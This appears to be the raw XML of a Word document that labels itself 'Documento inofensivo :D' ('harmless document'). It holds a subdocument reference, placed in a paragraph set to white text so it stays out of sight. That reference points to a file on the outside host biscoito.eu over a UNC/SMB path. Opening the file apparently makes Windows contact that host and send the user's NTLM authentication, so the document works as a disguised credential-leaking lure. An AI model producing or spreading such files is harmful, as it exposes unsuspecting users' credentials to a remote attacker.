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331" w:rsidRDefault="00212331">
      <w:r>
        <w:t>Documento inofensivo :D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00212331" w:rsidRDefault="00212331">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4387689" cy="568828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94" cy="569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331" w:rsidRPr="002B0DC2" w:rsidRDefault="00212331">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:subDoc r:id="rId5"/>
    </w:p>
    <w:sectPr w:rsidR="00212331" w:rsidRPr="002B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4A"/>
    <w:rsid w:val="00044B73"/>
    <w:rsid w:val="00155EB6"/>
    <w:rsid w:val="001A12DC"/>
    <w:rsid w:val="001A15FB"/>
    <w:rsid w:val="00212331"/>
    <w:rsid w:val="00400B73"/>
    <w:rsid w:val="004129A0"/>
    <w:rsid w:val="00456214"/>
    <w:rsid w:val="0058334A"/>
    <w:rsid w:val="006F351A"/>
    <w:rsid w:val="00756B88"/>
    <w:rsid w:val="008414F0"/>
    <w:rsid w:val="008D61C7"/>
    <w:rsid w:val="00AB3346"/>
    <w:rsid w:val="00D82727"/>
    <w:rsid w:val="00DA0B58"/>
    <w:rsid w:val="00E76E14"/>
    <w:rsid w:val="00E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5C1908B-7C67-4D89-B39C-7FE09BAF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B73"/>
    <w:rPr>
      <w:color w:val="FFFFFF" w:themeColor="background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subDocument" Target="file:///\\biscoito.eu\test\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biscoito</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>biscoito</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-16T19:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-17T17:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>